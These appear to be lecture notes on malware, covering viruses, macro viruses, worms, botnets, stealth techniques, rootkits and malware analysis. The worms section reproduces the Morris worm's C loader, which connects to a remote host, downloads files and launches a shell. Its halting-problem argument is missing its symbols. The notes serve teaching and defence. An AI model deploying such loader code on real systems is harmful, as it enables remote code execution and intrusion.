Definition

A malware is a portmanteau of “malicious software”, a code that is intentionally written to violate a security policy. There are several “categories”, or “features” of malwares:

  • Viruses: code that self-propagate by infecting other files, usually executables (but also documents with macros, boot loader), not standalone programs (i.e. executables)
  • Worms: programs that self-propagate, even remotely, often by exploiting host vulnerabilities, or by social engineering (e.g. mail worms)
  • Trojan horses: apparently benign program that hide a malicious functionality and allow remote control (usually controlled from remote)
  • Bots: programs that allow remote control of a machine, usually part of a bot

In 1971, the first malware Creeper demonstrated that systems could be infected. The first real virus was developed in 1981 and basically demonstrated that the hackers could actually exploit vulnerabilities. The word “virus” was coined in 1983. The scale of attacks escalated to the entire planet. Starting from 2012, due to the release of bitcoins, ransomware’s diffusion grew.

It is possible to distinguish three main movements in the history of malicious software:

  • Demonstration (90-00): showing off skills of the geek community. The viruses created in this period were not critical and were used by the software house to fix their products
  • Mass Attacks (>2000): profit oriented, organized groups, opportunism (beginning of botnets) were the main factors that motivated the geek community and the (raising) web criminals
  • Strategical Attacks (2010): high profile targets, critical infrastructures, political activism, espionage, states as actors (botnets too)

Fred Cohen (‘83) theorized the existence and produced the first examples of viruses which is only, according to his definition, a self replicating program. He only developed this from a theoretical computer science point of view, interesting concept of self modifying and self propagating code. Soon, the security challenges were understood.

Warning

It is impossible to build the perfect virus detector (i.e., propagation detector): Let be a perfect detection program and let be a virus that calls on itself

  • if halt (does not spread), so is not a virus
  • if spread, so is a virus

This is just another version of the halting problem, that refers to the impossibility of creating a program that can determine whether any given sentence (or program) will eventually halt or run forever. This fundamental limitation arises from the undecidability of the problem, meaning no algorithm can exist to solve it for all cases. However, the community started to look for ways to detect viruses and started studying the malicious code lifecycle.

The malicious code lifecycle can be divided into 4 phases:

  • reproduce, during which the malware creates copies of itself
  • infect, during which the malware infects other files or machines
  • stay hidden, during which the malware tries to avoid detection (stealth techniques) and stay alive
  • run payload, during which the malware executes its malicious code (e.g., steal data, send spam, etc.). The payload is just the code executed after the 3 previous steps, what is executed after the machine is infected (can be either harmful or not).

Malwares usually want to stay hidden during the lifecycle for a period of time to avoid being detected. In the reproduction and infection phase a balance infection versus detection possibility must be found together with a suitable propagation vector (may be social engineering or vulnerability exploits). We need to infect files (viruses only) and propagate to other machines. Modern malware does not self-propagate at all (most bots and trojans). In the 90s, to spread the virus the main device to carry viruses was the floppy disk, the common vector was in fact games.

Two main viruses exploited floppy disks:

  • Boot viruses: infect the Master Boot Record (MBR) of hard disk (first sector on disk) or boot sector of partitions (e.g. Brain, nowadays Mebroot/Torpig), these are rather old, but interest is growing again (diskless workstations, virtual machines (SubVirt)), floppies are among the first disks loaded by the BIOS (but not on UEFI systems)
  • File infectors: simple overwrite viruses (damages original program, it is easy to detect), parasitic viruses (instead of deleting the original program, they append code and modify program entry point to execute both the malicious and the normal code, not used because checking entry points easy allowed to detect it), or (multi)cavity virus (inject code in unused region(s) of program code)

Another vector used to spread viruses was the Macro.

Definition

A macro is a set of instructions that are grouped together as a single command to accomplish a task automatically. Macros are used to automate repetitive tasks, which can be done by a single command. A typical example is the “record macro” function in Microsoft Office.

Data files were traditionally considered safe from viruses, but the introduction of macro functionality has blurred the line between data and code. One notable example of this type of malware is the Melissa virus. What made Melissa particularly challenging to deal with was its ability to infect all files, making it difficult to remove. When a user opened a document infected with the Melissa virus, the macro within the document would execute, causing the virus to send itself to the first 50 contacts in the user’s address book. Although the Melissa virus was not destructive, it was incredibly annoying.

The Melissa virus was written in Visual Basic for Applications (VBA), a programming language commonly used for writing macros in Microsoft Office. It spread through email, with the virus being attached to a Word document. Once the infected document was opened, the virus would activate and start sending itself to the first 50 contacts in the user’s address book.

This type of malware highlighted the vulnerability of data files and the potential risks associated with macros. The Melissa virus served as a wake-up call for the security community, prompting a closer examination of the security measures needed to protect against such threats.

It is important to be cautious when opening email attachments, especially those that contain macros. Keeping antivirus software up to date and regularly scanning files for potential threats can help mitigate the risk of falling victim to malware like the Melissa virus. By staying vigilant and adopting best practices for cybersecurity, users can better protect themselves and their data from these types of malicious attacks.

Worms

Definition

A worm is a type of malware that spreads copies of itself from computer to computer. Worms often use networks to spread, relying on security vulnerabilities to infect other devices. Unlike viruses, worms do not need to attach themselves to an existing program to spread.

The Internet faced a major disruption in November 1988 when Robert Morris Jr., a Ph.D. student at Cornell, unleashed a program that caused havoc on the ARPANET. With just 99 lines of code, Morris created a program that could exploit vulnerabilities such as buffer overflow and password cracking.

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
 
main(argc, argv)
char *argv[];
{
	struct sockaddr_in sin;
	int s, i, magic, nfiles, j, len, n;
	FILE *fp;
	char files[20][128];
	char buf[2048], *p;
 
	unlink(argv[0]);
	if(argc != 4)
		exit(1);
	for(i = 0; i < 32; i++)
		close(i);
	i = fork();
	if(i < 0)
		exit(1);
	if(i > 0)
		exit(0);
 
	bzero(&sin, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = inet_addr(argv[1]);
	sin.sin_port = htons(atoi(argv[2]));
	magic = htonl(atoi(argv[3]));
 
	for(i = 0; i < argc; i++)
		for(j = 0; argv[i][j]; j++)
			argv[i][j] = '\0';
 
	s = socket(AF_INET, SOCK_STREAM, 0);
	if(connect(s, &sin, sizeof(sin)) < 0){
		perror("l1 connect");
		exit(1);
	}
	dup2(s, 1);
	dup2(s, 2);
 
	write(s, &magic, 4);
 
	nfiles = 0;
	while(1){
		if(xread(s, &len, 4) != 4)
			goto bad;
		len = ntohl(len);
		if(len == -1)
			break;
 
		if(xread(s, &(files[nfiles][0]), 128) != 128)
			goto bad;
 
		unlink(files[nfiles]);
		fp = fopen(files[nfiles], "w");
		if(fp == 0)
			goto bad;
		nfiles++;
 
		while(len > 0){
			n = sizeof(buf);
			if(n > len)
				n = len;
			n = read(s, buf, n);
			if(n <= 0)
				goto bad;
			if(fwrite(buf, 1, n, fp) != n)
				goto bad;
			len -= n;
		}
		fclose(fp);
	}
 
	execl("/bin/sh", "sh", 0);
bad:
	for(i = 0; i < nfiles; i++)
		unlink(files[i]);
	exit(1);
}
 
static
xread(fd, buf, n)
char *buf;
{
	int cc, n1;
 
	n1 = 0;
	while(n1 < n){
		cc = read(fd, buf, n - n1);
		if(cc <= 0)
			return(cc);
		buf += cc;
		n1 += cc;
	}
	return(n1);
}
int zz;

Once connected to a computer, the program would copy itself to the new location and start running. Both the original code and its copies would continue this process, spreading rapidly across the ARPANET. However, this unintended behavior caused widespread damage and brought down the Internet. This incident served as a stark reminder of the potential consequences of unchecked malware and the importance of robust security measures.

Mass mailers are the most common type of worm and they were developed when mail software started allowing attached files, including executables (dancing bears) and executables masquerading as data (e.g. “LOVE-LETTER-FOR-YOU.txt.vbs”). These worms were simply spread by emailing themselves to others, using an address book to look more trustworthy. Modern variations include social networks to spread (e.g. suspicious-looking Twitter messages or Facebook posts from a friend).

Modern Worms: Mass Scanners

The basic pattern is the same: a computer is infected and seeks out new targets. Spreading is faster (minutes) and happens on a larger scale (hundreds of thousands of hosts). The main feature is scanning, which can be performed in various ways:

  • Select random address
  • Local preference: more scans towards local network
  • Permutation scanning (divide up IP address space), more efficient, doesn’t infect already infected machines
  • Hit list scanning
  • Warhol worm: Hit list + permutation, most efficient: exponential speed in spread.

Anyone in the security field speculated that the future would bring more worm outbreaks. However, since 2004, there has been a lack of major worm incidents. Although there were vulnerabilities that could be exploited, the worm writers seemed to have disappeared. One might wonder why no worm has ever targeted the Internet infrastructure. The reason is simple: destroying the internet would hinder the spread of worms. While there were windows of opportunity for attacks, the attackers needed the infrastructure to be functional to carry out their activities. Nowadays, attackers are more interested in monetizing their malware through various means.

  • Direct monetization (e.g., abuse of credit cards, connection to premium numbers)
  • Indirect monetization (information gathering, abuse of computing resources, rent or sell botnet infrastructures). All of this created a growing underground (black) economy and cybercrime ecosystem.

Attacks are in real life carried on by criminal groups that hire one group to create a malware and another one to spread it (these have the infrastructure to do so). The criminal’s group will monetize from the malware and hire another group of criminal to convert their money so that it is not tracked (e.g. scam activities). Various “activities” are involved: exploit development and procurement, site infection, victim monitoring, selling “exploit kits”, support to the clients.

Bots

Definition

A bot is a program that is simply used for IRC channels, to leave them open.

At the beginning only universities and companies could allow permanent internet connection, and this is where the first bots were used. However, they began being used for other purposes as well, using the channel to command the bot and the machine from university.

A botnet nowadays is a network of compromised machines, under the control of a command and control server.

DoS attacks were carried on using this mechanism: the abuse of IRC bots (IRCwars, one of the first documented DDoS attacks), in 1999 trinoo’s “DDoS attack tool” (originally ran on Solaris and later ported to Windows, setup of the botnet was mostly manual) and in August 1999 the DDoS attack against a server at University of Minnesota using at least 227 bots. In 2000s a DDoS attacks against high profile websites (Amazon, CNN, eBay) got huge media coverage.

A botnet is a network that consists of several malicious bots that are controlled by a commander, commonly known as botmaster (botherder). Botnets allow to do anything on the infected machines, for example Phatbot allows to harvest email addresses from host, log all keypresses, sniff network traffic, take screenshots, start an http server that allows to browse C:, kill a hard-coded list of processes (AV programs, rival malware), steal windows CD keys (also keys to popular games), socks proxy (sets up a proxy to be used as a “stepping stone” for SPAM), download file at an URL, run a shell command, update, allows to change the available commands.

Threats posed by bot(net)s are:

  • For the infected host: information harvesting (identity data, financial data, private data, e-mail address books, any other type of data that may be present on the host of the victim)
  • For the rest of the Internet: Spamming, DDoS, Propagation (network or email worm), Support infrastructure for illegal internet activity (the botnet itself, phishing sites, drive-by-download sites)

To defend against malware some techniques are usually combined:

  • Patches: most worms exploit known vulnerabilities, useless against zero-day worms
  • Signatures: must be developed automatically, worms operate too quickly for human response
  • Intrusion or anomaly detection: notice fast spreading, suspicious activity, can be a driver to automated signature generation

Antivirus and Anti-malware

Antivirus and Anti-malware’s basic strategy is signature-based detection, the binary of a known malware is analyzed and a database of byte-level or instruction-level signatures allows to compare similarities that match known malware. Wildcards can be used, also regular expressions are common. However, this only works for known attacks.

The evolution of malware is faster than the human ability to study them, combining these strategies is the best approach. In fact, since it is not enough antivirus and anti malware also exploit heuristics, i.e. checking for signs of infection (code execution starts in last section, incorrect header size in PE header, suspicious code section name, patched import address table) also behavioral detection is applied: this strategy detect signs (behavior) of known malware and “common behaviors” of malware. Not everything needs an antivirus: it all depends on the threat assessment and the trade off with cases.

Virus Stealth Techniques

Stealth techniques are defense mechanisms employed by malware who want to avoid being detected. Virus scanners quickly discover viruses by searching around entry point, therefore viruses can deploy:

  • Entry Point Obfuscation: the virus deploys multicavity, hijacks control after program is launched (overwrite import table addresses (e.g., libraries) and function call instructions)
  • Polymorphism: the virus changes layout (shape) with each infection, the same payload is encrypted (packing) using different key for each infection to make signature analysis practically impossible (AV could detect encryption routine, but this is a common activity in the pc)
  • Packers: the virus encrypts/decrypts itself before/after execution, uses a small encryption/decryption routine, changes the key at each execution. Typical functions are de/compress, de/encrypt, metamorphic components, anti-debugging techniques, anti-VM techniques, virtualization
  • Metamorphism: the virus creates different “versions” of code that look different but have the same semantics (i.e., do the same)

The primary stealth techniques employed by malware include polymorphism and metamorphism, which are designed to preserve the underlying functionality while generating various versions of the malicious code. Additional general stealth techniques utilized by malware include:

  • Dormant periods: This strategy involves delaying malicious activity, where the malware remains inactive for a predetermined period or until specific conditions are met (e.g., a particular date or event). This approach aims to evade detection during initial scans or surveillance.
  • Event-triggered payloads: Malware often incorporates event-driven activation mechanisms, where the execution of malicious payloads is contingent upon specific events or commands received via a Command and Control (C&C) channel. By remaining dormant until triggered, the malware can avoid detection until it receives the necessary stimulus.
  • Anti-virtualization techniques: Advanced malware employs methods to detect and evade virtual machine (VM) environments, where its malicious behavior is suppressed or altered. Techniques may include timing-based attacks that exploit differences in virtualized and physical environments, or environmental checks to identify virtual machine characteristics.
  • Encryption/Packing: Similar to polymorphism, this technique involves encrypting or packing the malware code using sophisticated algorithms and techniques. Encrypted or packed malware variants can evade signature-based detection and analysis tools, complicating efforts to identify and analyze their malicious payloads.
  • Rootkit techniques: Among the most advanced stealth methods, Rootkits techniques involve modifying the core components of the operating system (OS), such as the kernel, to conceal the presence of malware. This may include techniques like syscall hijacking, where the malware intercepts and modifies OS system calls to manipulate system behavior and evade detection by security measures.

These techniques collectively enhance the malware’s ability to persist undetected within systems, prolonging their operational lifespan and maximizing their impact on targeted environments.

Anti-virtualization techniques

If a program is not run natively on a machine, chances are high that it is being analyzed (in a security lab), scanned (inside a sandbox of an Antivirus product) or debugged (by a security specialist). Modern malware detect execution environment to complicate analysis, which can be performed on:

  • virtual machine: very easy (timing, environment detection)
  • hardware supported virtual machine: adjusted techniques, still easy (timing, environment detection)
  • emulator: theoretically undetectable, practically also easy to detect (timing attack, incomplete specs so different emulator implementations)

Rootkits

Definition

A rootkit is a set of software tools that enable an unauthorized user to gain control of a computer system without being detected. Rootkits are typically installed through a security vulnerability or by exploiting a password. Once installed, a rootkit can allow an attacker to execute files, access system data, and monitor user activity.

This is a historical term: one become roots on a machine, and plants their kit to remain root so that is allowed to make files, processes, user and directories disappear. The attacker also wants to remain invisible and the kit is what they use to hide their tracks.

Rootkits can be deployed at two main levels: userland or kernel-space.

A Linux userland rootkit example consists of a backdoored login, sshd, passwd and trojanized utilities to hide: ps, netstat, ls, find, du, who, w, finger, ifconfig. Windows userland rootkit targets can be Task Manager, Process Explorer, Netstat, ipconfig. Once access is gained, trojanized utilities to remain hidden must be used so that the presence of the malware is not detected (trojanized utilities hide the attacker only). To hide our tracks, we must trojanize all (equivalent) commands. They are thus often incomplete: the attacker will trojanize a subset of utilities, using all equivalent command the malware might be easy to detect (cross layer examination, comparing utilities with a clean machine’s).

Another possibility is to develop a rootkit at kernel level, where the rootkit does syscall hijacking. Every time a syscall is called, the output is masked by the attacker, utilities are not substituted but show fake results which hide the attacker’s tracks. Kernel space rootkit is more difficult to build, but can hide artifacts completely. It can only be detected via post-mortem analysis i.e. checking all the single components once the machine is off.

Methods for recognizing rootkits are:

  • intuition (easiest technique), consists of looking for the funny effect which hide inconsistencies
  • post mortem analysis on different systems
  • trusted computing base/tripware
  • cross-layer examination, the same sources are checked from different points of view.

However, rootkits can get even more complex:

  • Rootkit in BIOS: in ACPI (John Heasman) CMOS (eEye bootloader), Bootkit (not even in the BIOS, Brossard)
  • Rootkit on firmware of NIC or Video Card
  • Rootkits in virtualization systems (how to recognize a rootkit which acts as an hypervisor?) The device will always be infected even after switching off.

Counteracting Malware: Malware Analysis Overview

A typical workflow after a malware is discovered consists of:

  1. suspicious executable reported by “someone”
  2. automatically analyzed
  3. manually analyzed
  4. antivirus signature developed

There are to ways to analyze the malware:

Dynamic analysisStatic analysis
observing the runtime behavior of the executableparse the executable code
Prosobfuscation (metamorphism, encryption, packing, …)code coverage, dormant code
Conscode coverage, dormant codeobfuscation (metamorphism, encryption, packing, …)

Static Analysis

Static analysis is the process of examining the code of a program without executing it. This approach involves analyzing the binary code or source code of the malware to identify potential threats, vulnerabilities, or malicious behavior. Static analysis techniques include:

  • Disassembly: The process of converting machine code into assembly language to understand the program’s logic and functionality.
  • Decompilation: The reverse engineering process of converting machine code or assembly language back into a higher-level programming language to analyze the program’s structure and behavior.
  • Code analysis: The examination of the program’s code to identify vulnerabilities, malicious functions, or suspicious behavior.
  • Signature matching: The comparison of the malware’s code against known signatures or patterns to detect known threats.
  • Pattern recognition: The identification of specific patterns or sequences in the code that indicate malicious behavior or vulnerabilities.

Static analysis provides valuable insights into the structure and behavior of malware, enabling security researchers to identify potential threats and develop effective countermeasures. By examining the code and logic of the malware, analysts can gain a deeper understanding of its capabilities, intentions, and impact on systems and networks. This kind of analysis in particularly useful for identifying dormant code, obfuscated code, and hidden functionality that may not be immediately apparent during dynamic analysis.

Dynamic Analysis

Dynamic analysis involves executing the malware in a controlled environment to observe its behavior, interactions, and impact on the system. This approach allows security researchers to study the malware’s runtime behavior, network activity, system modifications, and payload execution. Dynamic analysis techniques include:

  • Sandboxing: The isolation of the malware in a controlled environment to prevent it from affecting the host system and network.
  • Behavioral monitoring: The observation of the malware’s actions, interactions, and system modifications during execution to identify malicious behavior.
  • Network monitoring: The analysis of the malware’s network activity, communication channels, and data exchanges to detect command-and-control (C&C) traffic or data exfiltration.
  • Payload analysis: The examination of the malware’s payload execution, data manipulation, and system modifications to understand its impact on the system.
  • Memory analysis: The study of the malware’s memory usage, process interactions, and system calls to identify malicious behavior or vulnerabilities.
  • Dynamic code analysis: The analysis of the malware’s runtime behavior, function calls, and system interactions to predict its actions and impact.
  • Execution tracing: The monitoring of the malware’s execution flow, function calls, and system interactions to track its behavior and identify malicious activities.
  • Resource monitoring: The observation of the malware’s resource usage, file access, and system modifications to detect malicious behavior or system changes.

Dynamic analysis provides real-time insights into the behavior and impact of malware, enabling security researchers to identify threats, vulnerabilities, and malicious activities. By executing the malware in a controlled environment and monitoring its actions, analysts can gain a deeper understanding of its capabilities, intentions, and impact on systems and networks. This kind of analysis is particularly useful for analyzing malware that adopts obfuscation, polymorphism, or anti-debugging techniques to evade detection.